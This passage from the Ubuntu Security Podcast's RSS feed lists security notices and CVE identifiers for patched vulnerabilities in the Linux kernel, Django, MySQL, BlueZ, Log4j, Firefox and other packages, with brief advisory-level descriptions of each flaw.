goes about reviewing software destined for main, plus we cover security
updates for Django, BlueZ, NVIDIA Graphics Drivers and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>53 unique CVEs addressed</p>
<h3 id="usn-5265-1-linux-kernel-vulnerabilities-01-19">[<a href="https://ubuntu.com/security/notices/USN-5265-1">USN-5265-1</a>] Linux kernel vulnerabilities [01:19]</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42327">CVE-2021-42327</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4202">CVE-2021-4202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4093">CVE-2021-4093</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4090">CVE-2021-4090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4001">CVE-2021-4001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3772">CVE-2021-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3752">CVE-2021-3752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3640">CVE-2021-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27820">CVE-2020-27820</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 impish + focal hwe + 5.11 focal cloud kernel (gcp/aws/oracle/azure)</li>
</ul>
<h3 id="usn-5266-1-linux-kernel--gke--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5266-1">USN-5266-1</a>] Linux kernel (GKE) vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22600">CVE-2021-22600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 gke</li>
</ul>
<h3 id="usn-5267-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5267-1">USN-5267-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3752">CVE-2021-3752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3640">CVE-2021-3640</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 focal + bionic hwe</li>
</ul>
<h3 id="usn-5268-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5268-1">USN-5268-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3752">CVE-2021-3752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3640">CVE-2021-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20322">CVE-2021-20322</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 bionic + 16.04 hwe + 14.04 azure</li>
</ul>
<h3 id="usn-5260-3-samba-vulnerability-02-29">[<a href="https://ubuntu.com/security/notices/USN-5260-3">USN-5260-3</a>] Samba vulnerability [02:29]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44142">CVE-2021-44142</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-147/">Episode 147</a> - <code>vfs_fruit</code> RCE</li>
</ul>
<h3 id="usn-5269-1-usn-5269-2-django-vulnerabilities-03-00">[<a href="https://ubuntu.com/security/notices/USN-5269-1">USN-5269-1</a>, <a href="https://ubuntu.com/security/notices/USN-5269-2">USN-5269-2</a>] Django vulnerabilities [03:00]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23833">CVE-2022-23833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22818">CVE-2022-22818</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XSS via incorrect handling of the <code>{% debug %}</code> template tag - failed to
properly encode the current context</li>
<li>Possible infinite loop when parsing multipart forms as used when doing
file uploads</li>
</ul>
<h3 id="usn-5270-1-usn-5270-2-mysql-vulnerabilities-03-38">[<a href="https://ubuntu.com/security/notices/USN-5270-1">USN-5270-1</a>, <a href="https://ubuntu.com/security/notices/USN-5270-2">USN-5270-2</a>] MySQL vulnerabilities [03:38]</h3>
<ul>
<li>26 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21379">CVE-2022-21379</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21378">CVE-2022-21378</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21374">CVE-2022-21374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21372">CVE-2022-21372</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21370">CVE-2022-21370</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21368">CVE-2022-21368</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21367">CVE-2022-21367</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21362">CVE-2022-21362</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21358">CVE-2022-21358</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21351">CVE-2022-21351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21348">CVE-2022-21348</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21344">CVE-2022-21344</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21342">CVE-2022-21342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21339">CVE-2022-21339</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21304">CVE-2022-21304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21303">CVE-2022-21303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21302">CVE-2022-21302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21301">CVE-2022-21301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21270">CVE-2022-21270</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21265">CVE-2022-21265</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21264">CVE-2022-21264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21256">CVE-2022-21256</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21254">CVE-2022-21254</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21253">CVE-2022-21253</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21249">CVE-2022-21249</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21245">CVE-2022-21245</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21367">CVE-2022-21367</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21344">CVE-2022-21344</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21304">CVE-2022-21304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21303">CVE-2022-21303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21270">CVE-2022-21270</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21245">CVE-2022-21245</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>8.0.23 for Ubuntu 20.04 LTS and 21.10</li>
<li>5.7.37 for Ubuntu 18.04 LTS and Ubuntu 16.04 ESM</li>
</ul>
<h3 id="usn-5030-2-perl-dbi-module-vulnerabilities-04-11">[<a href="https://ubuntu.com/security/notices/USN-5030-2">USN-5030-2</a>] Perl DBI module vulnerabilities [04:11]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14393">CVE-2020-14393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-10402">CVE-2014-10402</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-125/">Episode 125</a></li>
</ul>
<h3 id="usn-5262-1-gpt-fdisk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5262-1">USN-5262-1</a>] GPT fdisk vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-0308">CVE-2021-0308</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0256">CVE-2020-0256</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5264-1-graphviz-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5264-1">USN-5264-1</a>] Graphviz vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-18032">CVE-2020-18032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11023">CVE-2019-11023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10196">CVE-2018-10196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5275-1-bluez-vulnerability-04-25">[<a href="https://ubuntu.com/security/notices/USN-5275-1">USN-5275-1</a>] BlueZ vulnerability [04:25]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0204">CVE-2022-0204</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow in gatt-server implementation since failed to check
lengths of incoming packets - could allow a remote attacker to DoS or RCE</li>
</ul>
<h3 id="usn-4754-5-python-vulnerability-04-53">[<a href="https://ubuntu.com/security/notices/USN-4754-5">USN-4754-5</a>] Python vulnerability [04:53]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27619">CVE-2020-27619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3177">CVE-2021-3177</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Reinstate fix for CVE-2021-3177 which was previously removed due to a
regression</li>
</ul>
<h3 id="usn-5276-1-nvidia-graphics-drivers-vulnerabilities-05-15">[<a href="https://ubuntu.com/security/notices/USN-5276-1">USN-5276-1</a>] NVIDIA graphics drivers vulnerabilities [05:15]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21814">CVE-2022-21814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21813">CVE-2022-21813</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues around handling of permissions within the kernel - could
allow a local user to write to protected memory in the kernel and DoS
machine</li>
</ul>
<h3 id="usn-5267-2-linux-kernel-regression-05-52">[<a href="https://ubuntu.com/security/notices/USN-5267-2">USN-5267-2</a>] Linux kernel regression [05:52]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3752">CVE-2021-3752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3640">CVE-2021-3640</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 focal + bionic hwe</li>
<li>Inadvertent DoS when accessing CIFS shares - kernel hang - fixed by
reverting various CIFS related patches</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="main-vs-universe-with-camila">Main vs Universe with Camila</h3>
<ul>
<li>Camila discusses the different software repository components in Ubuntu -
what they are, how they compare and what you can expect to find in each,
as well as the process for moving packages from universe to main to be
supported by Canonical, in particular focusing on the security team&rsquo;s
role in performing security audits of each software package along the
way.</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E148.mp3" length="37491864" type="audio/mpeg" /><itunes:duration>60:51</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 147
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-147/</link>
          <pubDate>Fri, 04 Feb 2022 16:33:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>6020d719c1b8146a445c7222c417200832c692f06a0b77a88f734f40a23ab0a633ba3fe62b561dfc1d5edabcf8ddb7ea5b1736e1976a9c0f9a47999d3ec73f25</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 147</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          We're back after a few weeks off to cover the launch of the Ubuntu Security
  Guide for DISA-STIG, plus we detail the latest vulnerabilities and updates
  for lxml, PolicyKit, the Linux Kernel, systemd, Samba and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  We're back after a few weeks off to cover the launch of the Ubuntu Security
  Guide for DISA-STIG, plus we detail the latest vulnerabilities and updates
  for lxml, PolicyKit, the Linux Kernel, systemd, Samba and more.
  </itunes:summary>
        <description>  We're back after a few weeks off to cover the launch of the Ubuntu Security
  Guide for DISA-STIG, plus we detail the latest vulnerabilities and updates
  for lxml, PolicyKit, the Linux Kernel, systemd, Samba and more.
  </description>
        <googleplay:description>  We're back after a few weeks off to cover the launch of the Ubuntu Security
  Guide for DISA-STIG, plus we detail the latest vulnerabilities and updates
  for lxml, PolicyKit, the Linux Kernel, systemd, Samba and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>We&rsquo;re back after a few weeks off to cover the launch of the Ubuntu Security
Guide for DISA-STIG, plus we detail the latest vulnerabilities and updates
for lxml, PolicyKit, the Linux Kernel, systemd, Samba and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>100 unique CVEs addressed</p>
<h3 id="usn-5225-1-lxml-vulnerability-00-57">[<a href="https://ubuntu.com/security/notices/USN-5225-1">USN-5225-1</a>] lxml vulnerability [00:57]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43818">CVE-2021-43818</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python bindings for venerable libxml2 + libxslt - used by many other
python packages for parsing XML etc</li>
<li>HTML cleaner module - designed to clean up HTML by removing embedded
scripts, special tags, CSS style annotations and more.</li>
<li>Would allow crafted scripts to bypass the filter - same for SVG which
could embed scripts via data URIs - code execution as a result -&gt; RCE</li>
</ul>
<h3 id="usn-5210-2-linux-kernel-regression-02-03">[<a href="https://ubuntu.com/security/notices/USN-5210-2">USN-5210-2</a>] Linux kernel regression [02:03]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43056">CVE-2021-43056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41864">CVE-2021-41864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20321">CVE-2021-20321</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26541">CVE-2020-26541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-136/">Episode 136</a> - [<a href="https://ubuntu.com/security/notices/USN-5210-1">USN-5210-1</a>] - caused boot failure on machines that had AMD
Secure Encrypted Virtualisation enabled</li>
</ul>
<h3 id="usn-5223-1-apache-log4j-1-dot-2-vulnerability-02-21">[<a href="https://ubuntu.com/security/notices/USN-5223-1">USN-5223-1</a>] Apache Log4j 1.2 vulnerability [02:21]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4104">CVE-2021-4104</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>JMS Appender module in Log4j 1.2 - requires the attacker to be able to
first modify the Log4j config - but can then get code execution - similar
to the original Log4Shell <a href="https://ubuntu.com/security/CVE-2021-44228">CVE-2021-44228</a> but not as severe</li>
</ul>
<h3 id="usn-5224-2-ghostscript-vulnerabilities-02-57">[<a href="https://ubuntu.com/security/notices/USN-5224-2">USN-5224-2</a>] Ghostscript vulnerabilities [02:57]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45949">CVE-2021-45949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45944">CVE-2021-45944</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-146/">Episode 146</a></li>
</ul>
<h3 id="usn-5227-1-usn-5227-2-pillow-vulnerabilities-03-06">[<a href="https://ubuntu.com/security/notices/USN-5227-1">USN-5227-1</a>, <a href="https://ubuntu.com/security/notices/USN-5227-2">USN-5227-2</a>] Pillow vulnerabilities [03:06]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22817">CVE-2022-22817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22816">CVE-2022-22816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22815">CVE-2022-22815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34552">CVE-2021-34552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23437">CVE-2021-23437</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various DoS / possible RCE via crafted image files</li>
</ul>
<h3 id="usn-5229-1-firefox-vulnerabilities-03-27">[<a href="https://ubuntu.com/security/notices/USN-5229-1">USN-5229-1</a>] Firefox vulnerabilities [03:27]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22752">CVE-2022-22752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22751">CVE-2022-22751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22748">CVE-2022-22748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22747">CVE-2022-22747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22745">CVE-2022-22745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22743">CVE-2022-22743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22742">CVE-2022-22742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22741">CVE-2022-22741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22740">CVE-2022-22740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22739">CVE-2022-22739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22738">CVE-2022-22738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22737">CVE-2022-22737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4140">CVE-2021-4140</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>96.0</li>
<li>Usual mix of web issues with standard consequences -&gt; DoS / spoof browser
UI, bypass security / content restrictions, info leak, RCE</li>
</ul>
<h3 id="usn-5233-1-usn-5233-2-clamav-vulnerability-03-59">[<a href="https://ubuntu.com/security/notices/USN-5233-1">USN-5233-1</a>, <a href="https://ubuntu.com/security/notices/USN-5233-2">USN-5233-2</a>] ClamAV vulnerability [03:59]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-20698">CVE-2022-20698</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read when using the <code>CL_SCAN_GENERAL_COLLECT_METADATA</code> option and
handling OOXML files - remote attacker could supply an input file which
could trigger this -&gt; crash</li>
</ul>
<h3 id="usn-5235-1-ruby-vulnerabilities-04-24">[<a href="https://ubuntu.com/security/notices/USN-5235-1">USN-5235-1</a>] Ruby vulnerabilities [04:24]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41819">CVE-2021-41819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41817">CVE-2021-41817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41816">CVE-2021-41816</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5234-1-byobu-vulnerability-04-25">[<a href="https://ubuntu.com/security/notices/USN-5234-1">USN-5234-1</a>] Byobu vulnerability [04:25]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7306">CVE-2019-7306</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Apport hook for Byobu would upload the local <code>.screenrc</code> file which could
possibly contain private info</li>
</ul>
<h3 id="usn-5240-1-linux-kernel-vulnerability-05-09">[<a href="https://ubuntu.com/security/notices/USN-5240-1">USN-5240-1</a>] Linux kernel vulnerability [05:09]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0185">CVE-2022-0185</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer underflow -&gt; OOB write when parsing file system properties -
possible code execution -&gt; requires root privileges to trigger BUT can
also be done from a user namespace - ie where a local user can masquerade
as root</li>
</ul>
<h3 id="lsn-0084-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/LSN-0084-1">LSN-0084-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0185">CVE-2022-0185</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Livepatch for the above issue</li>
</ul>
<h3 id="usn-5242-1-open-vswitch-vulnerability-06-16">[<a href="https://ubuntu.com/security/notices/USN-5242-1">USN-5242-1</a>] Open vSwitch vulnerability [06:16]</h3>
<ul>
<li>1 CVEs addressed in Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3905">CVE-2021-3905</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory leak when handling fragmented packets - only affects most recent
versions of Open vSwitch so LTS releases etc not affected</li>
</ul>
<h3 id="usn-5243-1-usn-5243-2-aide-vulnerability-06-34">[<a href="https://ubuntu.com/security/notices/USN-5243-1">USN-5243-1</a>, <a href="https://ubuntu.com/security/notices/USN-5243-2">USN-5243-2</a>] AIDE vulnerability [06:34]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45417">CVE-2021-45417</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Advanced Intrusion Detection Environment
<ul>
<li>checks integrity of files - common security tool</li>
</ul>
</li>
<li>Heap buffer overflow when performing various base64 operations, as done
when handling XFS extended attributes or tmpfs ACLs - local privesc</li>
</ul>
<h3 id="usn-5246-1-thunderbird-vulnerabilities-07-21">[<a href="https://ubuntu.com/security/notices/USN-5246-1">USN-5246-1</a>] Thunderbird vulnerabilities [07:21]</h3>
<ul>
<li>26 CVEs addressed in Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43546">CVE-2021-43546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4126">CVE-2021-4126</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44538">CVE-2021-44538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43528">CVE-2021-43528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22751">CVE-2022-22751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22748">CVE-2022-22748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22747">CVE-2022-22747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22745">CVE-2022-22745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22743">CVE-2022-22743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22742">CVE-2022-22742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22741">CVE-2022-22741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22740">CVE-2022-22740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22739">CVE-2022-22739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22738">CVE-2022-22738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22737">CVE-2022-22737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43656">CVE-2021-43656</a> <!-- raw HTML omitted --></li>
